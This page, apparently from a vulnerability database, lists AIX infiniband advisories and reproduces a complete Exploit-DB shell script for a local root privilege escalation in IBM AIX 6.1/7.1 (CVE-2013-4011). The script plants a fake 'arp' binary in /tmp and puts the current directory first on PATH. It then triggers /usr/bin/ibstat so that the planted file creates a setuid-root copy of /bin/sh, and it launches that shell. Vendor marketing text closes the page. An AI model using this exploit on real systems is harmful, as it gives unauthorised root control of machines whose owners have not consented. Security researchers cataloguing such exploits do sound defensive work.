| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| IBM AIX 6.1 / 7.1 - Local root Privilege Escalation Vulnerability | 24 Sep 201300:00 | – | zdt | |
| ibstat $PATH Privilege Escalation Exploit | 4 Apr 201400:00 | – | zdt | |
| AIX 7.1 TL 2 : infiniband (IV43561) | 19 Jul 201300:00 | – | nessus | |
| AIX 7.1 TL 0 : infiniband (IV43562) | 19 Jul 201300:00 | – | nessus | |
| AIX 6.1 TL 8 : infiniband (IV43580) | 19 Jul 201300:00 | – | nessus | |
| AIX 6.1 TL 6 : infiniband (IV43582) | 19 Jul 201300:00 | – | nessus | |
| AIX 7.1 TL 1 : infiniband (IV43756) | 19 Jul 201300:00 | – | nessus | |
| AIX 6.1 TL 7 : infiniband (IV43827) | 19 Jul 201300:00 | – | nessus | |
| AIX 7.1 TL 1 : devices.common.IBM.ib.rte (U855867) | 13 Aug 201300:00 | – | nessus | |
| AIX 6.1 TL 8 : devices.common.IBM.ib.rte (U855978) | 10 Aug 201300:00 | – | nessus |
# Exploit-DB Note: Screenshot provided by exploit author
#
#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <[email protected]>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011
echo '
mm mmmmm m m
## # # #
# # # ##
#mm# # m""m
# # mm#mm m" "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"
TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh
cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!
chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
echo "[+] Access granted. Don't be evil..."
${RSHELL}
else
echo "[-] Exploit failed. Try some 0day instead..."
fiData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation